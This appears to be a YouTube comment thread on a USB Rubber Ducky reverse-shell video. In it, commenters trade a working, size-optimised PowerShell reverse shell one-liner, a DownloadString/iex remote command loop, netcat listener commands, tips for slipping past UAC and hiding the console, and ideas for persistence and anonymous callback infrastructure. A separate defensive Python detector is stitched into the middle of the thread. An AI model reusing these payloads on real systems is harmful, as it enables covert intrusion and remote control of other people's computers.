Just a tip for anyone that may run into this issue like I have: When you write Ducky code to run CMD (or whatever you choose to open with the RUN command) and simulate the 'ALT + Y' key combination to select the 'Yes' button on the UAC dialog prompt, it's a good idea to follow up on the next line with a 'BACKSPACE' keystroke in the chance you're deploying onto a user's machine that has his/her UAC turned off. Otherwise, if you don't account for UAC being disabled, your first line of code typed into the CMD window will be prefixed with a 'y' character leading off (which of course throws an error and renders the whole payload useless). Pressing backspace as the first key press on a machine that does have UAC enabled will effectively do nothing at all since there's nothing to delete. It's a win-win and you don't have to deal with the irony of your attack being thwarted by someone who has disabled a feature meant to make them safer. It's like leaving your front door open only to have a thief knock himself out cold by walking into the knife edge of the opened door. Haha >.
Chris Evans you legend i have been getting "y mode is not a recognised command" thanks for the info
Mitch Maguny Awesome! Glad it helped. Just a note: Pressing CTRL + C is actually quicker and easier than pressing Left Arrow + Delete. But either one works ;)
Chris Evans So the next line literally reads CTRL + C ?
Mitch Maguny It would literally read CTRL C (if you're talking about the ducky code format). Here's an example screenshot of what that section of code would look like: i.gyazo.com/a295f2c5e4c46ae1c57767e95e516c4f.png
Ok thanks for that, I have only managed to get 2 scripts working so far. I have issues with the twin duck saving files to my drive.
You two ROCK. I love every one of your videos. Keep it up.
Thank you!
You are welcome. Any time I can help out.
That shirt is a must!
Disk OS......
What happened to dirty operating system
best blooper ever :)
I wish i had one -_-
just use some Chinese arduino micro for 10 $
the nsanamegenerator is down :C
1 sticker = +0.3 CPU cores
So this guy has ca. 9999999 CPUs? 😂🤘🏼
Lol😂
Don't buy stickers :D Just download more RAM LOL. Or RGB 1 led +2 gpu and + 999999999 fps
@@kubakaktus_ big brain time
Sending stickers
I can't help being distracted by the button presses to change cameras.
You made me realize it, can't stop paying attention to it now.
Lol me too, I was noticing this 😁
but if he's shooting all this live with no post production editing.. mad props.
Same XD
It's so cool right!??!!
Always run your listener with (nc -lvnp 8080), so you know you got the incoming connection. It enables verbose mode.
Agree, that's how I do it too
Got the single stage payload down to a 256 char run command. \o/
Cool! Please share!
"These hacker stickers make it go faster" -Darren
Loooooool
I managed to get the script down to 258 characters. Everything was going smoothly until I remembered "Oh yeah, you have to invoke powershell in there as well." Back up to 269 we go. Failsauce.
Anyway, here's the shortened script:
nal f New-Object;$s=(f Net.Sockets.TCPClient(4294967295,8)).GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){;$d=(f Text.UTF8Encoding).GetString($b,0,$i);$t=([text.encoding]::UTF8).GetBytes((iex $d 2>&1));$s.Write($t,0,$t.Length)}
converted variable names from 2 characters to 1 (10 characters)
deleted unnecessary white spaces (2 characters)
converted ip address to a 64 bit integer and removed the quotes( (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4) ) (7 characters)
moved to port 8 (3 characters)
switched to utf-8 encoding (2 characters)
created alias f for new-object (1 character)
BTW: The character cap on the windows run box is actually only 259 characters.
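A defender's view of the integer-IP trick in the comment above, as an added example that is not part of the original thread: a Python sketch that rewrites a decimal-integer TCPClient host back to dotted-quad form before blocklist matching, and flags the socket-then-iex and DownloadString-then-iex patterns quoted in these comments. The log lines, the blocklist and all function names are constructed for illustration.

```python
import re

# TCPClient(host, port) with a quoted or bare host argument.
TCPCLIENT_RE = re.compile(
    r"TCPClient\s*\(\s*['\"]?(?P<host>[^,'\"\s)]+)['\"]?\s*,\s*(?P<port>\d+)\s*\)",
    re.IGNORECASE,
)
EXEC_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\bDownloadString\s*\(", re.IGNORECASE)
DOTTED_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")


def normalise_host(host):
    """Return the dotted-quad form of an IPv4 literal, or None for anything else.

    Accepts the dotted form and the single decimal integer described in the
    comment: (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4), inverted here with shifts.
    """
    m = DOTTED_RE.match(host)
    if m:
        octets = [int(o) for o in m.groups()]
        if all(o <= 255 for o in octets):
            return ".".join(str(o) for o in octets)
        return None
    if not host.isdigit():
        return None  # a hostname or something else; leave it to DNS-based checks
    n = int(host)
    if n > 0xFFFFFFFF:
        return None
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def analyse(cmdline, blocklist):
    """Inspect one logged command line and report socket targets and exec patterns."""
    sockets = []
    for m in TCPCLIENT_RE.finditer(cmdline):
        raw = m.group("host")
        ip = normalise_host(raw)
        sockets.append({
            "raw_host": raw,
            "ip": ip,
            "port": int(m.group("port")),
            "obfuscated": ip is not None and ip != raw,
            "blocklisted": ip in blocklist,
        })
    executes = bool(EXEC_RE.search(cmdline))
    return {
        "sockets": sockets,
        "socket_then_exec": bool(sockets) and executes,
        "download_then_exec": bool(DOWNLOAD_RE.search(cmdline)) and executes,
    }


def flagged(cmdlines, blocklist):
    """Indices of command lines that deserve an analyst's attention."""
    hits = []
    for i, line in enumerate(cmdlines):
        r = analyse(line, blocklist)
        if (r["socket_then_exec"] or r["download_then_exec"]
                or any(s["blocklisted"] for s in r["sockets"])):
            hits.append(i)
    return hits


# Constructed process-creation command lines (documentation-range addresses,
# bodies elided with "..."); not captured from any real host.
SAMPLE_CMDLINES = [
    r'powershell "nal f New-Object;$s=(f Net.Sockets.TCPClient(3221225994,8)).GetStream(); ... iex $d ..."',
    r"powershell -c (New-Object Net.Sockets.TCPClient('files.example.test',443)).Connected",
    r"powershell iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10/example.ps1')",
    r"powershell Get-ChildItem C:\Users",
]
BLOCKLIST = {"192.0.2.10"}  # constructed indicator list

if __name__ == "__main__":
    for idx in flagged(SAMPLE_CMDLINES, BLOCKLIST):
        print(idx, analyse(SAMPLE_CMDLINES[idx], BLOCKLIST))
```

A plain substring search for `192.0.2.10` misses the first sample line because the address is logged as `3221225994`; matching on the normalised value catches it.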
-Reverse shell in 3 seconds
-Video is 1331 seconds long
😑
r/theydidthemath
I don't think you'd want a 3 second video. Even a 30 s video would be terrible
you don't really want a 3 second video "-_-"
Can't you just download the command to run?
$output = ''; while($true) { $output = iex (New-Object Net.WebClient).DownloadString("0.0.0.0/get_command_to_run.php?o=$output") }
get_command_to_run.php will prompt the user for a command to run and then print it. Then, powershell will receive that and run it. Then somehow send back the output as a parameter to the php script (I hope I did it ok, I don't know powershell).
i think the point is not doing things over network but the admin user actually creating the files 'themselves'.
Syntax looks about right.
+mikrobx you can encrypt that with Vigenère algorithm easily and send it through the network, antivirus can mostly detect sha256 decompression header, Vigenère uses only an or.
Denver is at 5280 and that airport is a circus of madness
did you catch the crazy apocalypse mural in the concors...
YES! In fact, I'm going to post some videos of it on my personal youtube page soon... That place was SO WEIRD. - Shannon (ruclips.net/user/shannonmorse)
i made this 0.5 seconds
Kryštof Píštěk it really depends on target computer. I don't know about 0.5 seconds, but lowering the initial delay is possible.
0.1
0.0 hehehehehe jk
how?
Hahaha
when doing this the powershell window stays open, and when closed it closes the session. Is this normal, and if so, can we change the script of the powershell to change this?
I didn't know about the php -S thing. Neat!
I kinda wish HaK5 would sell the bare minimum Tablet/Portable PC, but make it plug n play style. Branch Out and Expand HaK5!
Very good stuff. And the Powershell-script-download-based tactic you show here is a lot more useful, from a practical standpoint, than the Mr. Robot-featured Rubber Ducky attack that you made a vid on a few weeks ago. This doesn't require the logged-in user having admin privileges, and it gets you a shell (from which you can try to do anything you like, including trying to find a way to eventually elevate your privileges to admin and then dump credential hashes). A suggestion: it would be really neat to see a vid where you use a Powershell script along with Empire, Metasploit, or another tool to install a *persisting* backdoor that gets restarted each time a user logs in and periodically reaches back to your server on a schedule of your liking to create a reverse shell or get instructions. .
FASTER AND MORE INTENSE!!! xD
That's what she said.
How to change the keyboard layout from Arduino Mini (Pro Micro) to QWERTZ ? have problems with german (QWERTZ) keyboard layouts :c
video title : How to Get a Reverse Shell in *3 Seconds* with the USB Rubber Ducky
video time : 22 minutes, 11 seconds.
me : BRUH -_-
I've searched the comments for anything pertaining towards my question but can't seem to find anything!
So it seems that this method relies on two conditions being true
1. The user or victim must be logged in
2. The domain this victim is connected to isn't enforcing some sort of group policy (GPO is very common amongst any competent tech team)
My question is how can one install netcat on the victim machine if the target does not have any sort of admin privileges for that particular user due to GPO.
`sudo python -m SimpleHTTPServer 80` serves the current directory (`pwd` so you'll need to `cd` first), alternative to the php command as most distros are likely to already have python installed
"python -m SimpleHTTPServer "
Shannon Morse is the best example of nominative determinism I have seen in quite a while!
Did this faster than the speed of light
No the light speed isn't a time measure stupid imagine being a remote access trojan
The only thing I see wrong with this is the problem with it not running as administrator. You'd need to have that same ~3 second delay to run
powershell Start-Process powershell -Verb RunAs
then continue with downloading the PS script.
Anyone know where to get Darren's T-Shirt?
Just use the back doors factory, social engineering tools and host the reverse shell payload. It would be a Meterpreter shell that bypasses Antivirus.
Only Darren, GenX and Boomer programmers know the pain of squeezing out bytes in your code to make it fit 😅
I love those days where you had to think about cycles and/or memory usage. Even though 64K was enormous!
You could create a new virtual desktop or workspace (I'm not sure how it's called in windows) to hide a window
How about just enabling remote desktop, new admin user and slowing in firewall. Done and no code for defender to hit on.
should I get a Raspberry Pi 3 for kali linux?
TopGamingStudio any Pi will work, then again so will a USB jammed in a laptop with persistence
that's what she said
yes but i will be testing websites vulnerabilities and im just wondering will it be fast enough? to do anything
a persistence usb with Kali installed might be a better idea
MrX
Would still beat most of the rPi models...
I Wish i had a Rubber Ducky. BUT IT COSTS 50 BUCKS, Im... Broke...
Command Prompt has actually been around since Windows 2000 because Windows 2000 was the first version of Windows to be based on the NT kernel and not the win9x kernel. All win9x versions of Windows were essentially running on top of MS-DOS, and 2000 and newer were NOT based upon MS-DOS, that's why cmd.exe exists in those OS's.
if stickers make it faster, then I need a lot of them
Is this just casual flirting or are they going to get on with it?!
what linux distro are you using
ty .. using a Win32 API call to AttachConsole() + a WScript.Shell object ( see MSDN for docs on both ) with the Write method would allow you to exec a command stream more reliably and covertly ( unless that's what you're doing already ).
If not, the problem you can run into is needing to keep the console focused. The upside is Powershell can instantiate shell objects and make Win32 API calls ;).
when you want to buy a sticker for 2:50 but it costs 40$ shipping
is there a place to download the 20 second, first script they used at 5:00. i cant find it on their website/the rest of the internet
u can completely hide the CMD prompt from showing up by opening up a separate window using ctrl+win+d and once the CMD is executed, u can go back to the window and delete it... and since going back and deleting will only take like milliseconds... it won't be mostly noticeable...
you guys rock....thanks for the tetra , turtle and ducky....helped change my life !
Nice! I did something similar with an arduino nano iot with a led screen to "hack" wifi passwords easily. I would connect it to usb and use it as a keyboard to get the current connected wifi, list the password with key clear and send it back through COM to be shown in the LCD.
Just for the fun of seeing your friend's face when you ask to connect to the wifi and instead of asking for the key you ask to connect that stuff full of dupont cables in a test board to the USB to get it XDDDDDD
You forgot the illuminati contributions under dia
Heya, I rly want to do this to prank my friend but I am scared I am going to damage my friend's laptop. Is there a way where I can remove the reverse shell on his pc, if so can I do it remotely?
OMG thanks to your shirt I just realized that the toor in toorcon is root spelled backwards. I'm ashamed I didn't figure that out sooner. it might also help to actually go or look more into it.
If you want to go mobile with Netcat, on Android you can use the netcat binary that comes with Busybox (if it's installed, that is).
Powershell is just 4 scripting and programming languages in an overcoat. lol
Good stuff! That tree command output looks a lot like those tech support scams..... You're the one! ..Except you're missing the accent... Heh
just waiting for someone to type out the r.ps1 of the staged payload cuz I'm lazy (it has been 3 years and no one responded)
they talk bullsh*t all the time but talk sense for 3sec in the complete video
Faster and more intense.
Put some rubber on it(^.-) (-.^) (^.^)
On another note, how would you connect to the reverse shell? What would you define as your end point.
Sending it directly to your own equipment at your house isn't very sneaky, so if we think "bad hackers" here. Would you
then use a "borrowed" credit card to connect to some encrypted GSM equipment paid with that card and forward the connection to yourself or what ideas come to mind?
Lol just realized this video is from 5 years ago, I was wondering why he had a 2016 shirt
So once the command is run and terminal is open on windows system how do you make that either not viewable or make the power shell close?
I've seen a number of videos on reverse shell. Could they be used to fix a computer with a software problem since you can see everything on it? Could they be used to modify a computer such as to install a working new operating system?
Of course not. The reverse shell is running as long as the box is connected to the internet and is constantly running the backdoor. It's not possible to install a new OS as you have to 1) go into bootloader 2) get onto the new OS and then install the OS into bootloader and drive partition. This process will involve rebooting, OS switching, to the point where you cannot use an internet-based reverse shell to do it, and the program will have to be installed anew on the *nix OS or whatever OS you would like even if you tried to actually pull it off. That means you'd probably have to flash a new script for the *nix system.
Long story short, it isn't going to work.
@@skuldug1250
Your comment is interesting. Question: Could the reverse shell order an attack computer to shutdown or do a changeroot?
@@karlbergen6826 shutdown should work. chroot is a *nix operation, it's not (afaik) natively possible on windows but I also don't see the benefits of it -- what would be your goal?
Hack5 look like wannabe hacker
I'm going to do this on my zip disk
Good 😊
I love the USB Ducky, but the only problem I have is the driver load time on a lot of machines, being a simple HID device, I didn't think it would have to search windows update for a driver and download it, please if there is a bypass to make the install faster let me know!
If you make this a generic keyboard, the driver should already be there.
I am glad the wadsworth constant does not work on hak5 videos.
Awesome channel!!!
Keep it up!
And btw....
Y U NO USE VIM??? :P
Ull have to call the victim on phone and ask him to press yes on the popup
Why should you pre-install the setup when you need to take us through
@gain, thank you for all this information. yall always present the info in ways I can keep attention... thank U
What laptop are you using for linux?
#hak5 it has gotta be fiber, and all the servers.
Also how can i get access to hidden directories.
Ok, where did he get the shirt? I got to get one.
i dont think she knows whats happening
is shannon using a mini laptop? what is it
I'm glad to have found this channel since it is very good topics, good presentation and interesting to watch. Thanks sooo much!
Reverse shells can be better because a program calling out usually has an easier time getting through a firewall than a program trying to call into a computer.
That little php server command is *gold*. Thanks sooo much!
What notebook is darren using?
Looks like a Dell XPS 13
Looks like a Dell XPS 13
Not sure why people are saying "Looks like".....7:50 Either Darren is a troll or he named his laptop "xps13" because it is an XPS 13......
m sven because it looks like it
Gon Nespral I was being a little snarky....
wifi pineapple 2017 lol happy new year
don't get me wrong, I love Hak5 but umm this is what we always have done. Not sure if there is something to be learned here... You guys want to learn some old school look at an old magazine called "2600". And CMD and DOS is sorta an emulated version of actual DOS on newer version of MS OS's. Shells still work as they always have no different since 60's spool drive IBM systems. It's a conversation all on its own but really you need to just understand how C and Basic, not C++ or VB, work. Windows is not specific nor is Linux, it's all just custom GUI over a simpler on/off or on a non "L337" mind set, binary software basic structure. I hate leet or hacker thinking because those of us who know, or old schools, get that hacking is a conversational concept more than as it is thought of. Microsoft screwed conceptional thinking by making coding seem complicated and OS shell design out to be more complex than it is. OS2Warp people, Unix... we need to look at not relying on GUI's. Why I feel bad for ranting is cause programs like HAK5 kinda help newbz get the concept I am talking about. Hopefully this makes sense. Sorry for the rant, don't mean to be a prick.
❤️😁 The problem is it takes a long time 😁
The best thing, better than the Rubber Ducky, is reverse engineering using Java and Firebase 😊 I'll finish it soon, God willing 😁
The Rubber Ducky scares the user; most users are afraid of the emulator window.
Honestly, I've been following the Hak5 channel for 4 years now and it is one of my best sources on the internet, and also the channel
hak5
project 313
and two more nice channels 😁❤️
am very thankful 🙏 to know you guys 😁❤️
from iraq
I bought the duck and with the taxes and the tax I spent € 100.00 fixed red led light, I looked on their help site and I didn't solve it, I asked them for help via email, but only one answer they gave me saying that I would have contacted the assistance service .... € ... 100.00 thrown away. thank you
Ok I'm using nc on my macOS Catalina terminal using the command nc -l -p 8080 . I get the error no: missing port with option -l. Any ideas on what could be going wrong?
I need to compile a duckyscript txt file that I wrote originally for my USB Rubber Ducky.
But now I need to find a way to run the script as an exe file locally.
How can I make this possible? How can I compile the script to an exe file?
For everybody look whid cactus cheaper and better than rubber ducky!!! and P4wnP1 too is amazing!!!
20-30 second diversion is nothing in an office environment, you never spilled a drink on the floor... oh i forgot i'm a diabetic, i may get very dizzy and fall down in a second... oh look i tripped and hit my head on a desk/chair
none any use if you don't want to draw attention to yourself, but as you had to walk into an office and I can't think of one that does not have cctv in the entrance so you're already seen etc
"Microsoft decided they needed to do something completely different, and thus powershell was born"... If only they had simply just adopted a POSIX shell, everyone's lives would have been easier, and Microsoft would have had a lot more success with Windows.
Do like elie bursztein and have the usb get a reverse tcp meterpreter connection and you will have a prettier shell with clearer commands! Look up mal usb! But otherwise awesome stuff! 👍🤓
I don't have Rubber Ducky. I build HID device using Arduino UNO .... hehehehe
I'm pretty sure you're just joking, but if anyone is interested "faster" and "more intense" were directions George Lucas gave in the original star wars movie. He did it so much that the crew turned it into a running joke. I think they may have even made signs for Lucas, one saying "faster" and the other saying "more intense".
This is like the same thing I posted on their forum but way better lol mine just used the standard Net Cat executable in a zip file in a drop box extracted then ran with cmd via vbs to make it run invisibly. Anyway nice job I didn't think this could have been done faster I honestly never thought about a powershell version netcat.
does it still work when the cmd is closed? Because the victim might notice and just exit immediately
If so then it's Completely Useless.
Hey does anyone still have the script as its removed from their page.
By the way it was really interesting and juicy knowledge
Does the usb duck have to be permanently in the usb socket of the second computer during the connection or is it enough to insert it for a while while the script is loaded?
so, no usb no hack? what can we do then to prevent "internet "hacks""? & don't tell me about VPN...
the whole moving command prompt/ windows off screen is annoying. Although shrinking the restore window to nothingness is also urgh.
If we use the faster way, it needs to download something from a website (in this video Darren's PHP server), which is a concern that already stated at the very beginning of the video isn't it?
So if I understand correctly this means we can't get both advantage of high-injection-speed and high-success-chance right? It's a trade-off like, either 1) I sacrifice chance of success by having fast injection through downloading PS script, or 2) do this without downloading the PS script to have a higher chance, but with slower-injection.
Thoughts : jpeg with embedded nano script utilizing the single stage reverse power shell script?
Aren't these power shell scripts mitigated by a good group policy that prevents users from running power shell let alone that downloadstring command
Haha I always rep and tag you guys on social media for thousands and thousands to see 😊 I would scream in excitement if I ever won anything from you guys 😂
Question: How does this work if powershell is in Constrained Language mode?
Who makes his "hacker box"
Faster and more intense? What kind of Movies are you thinking about exactly? Hmm?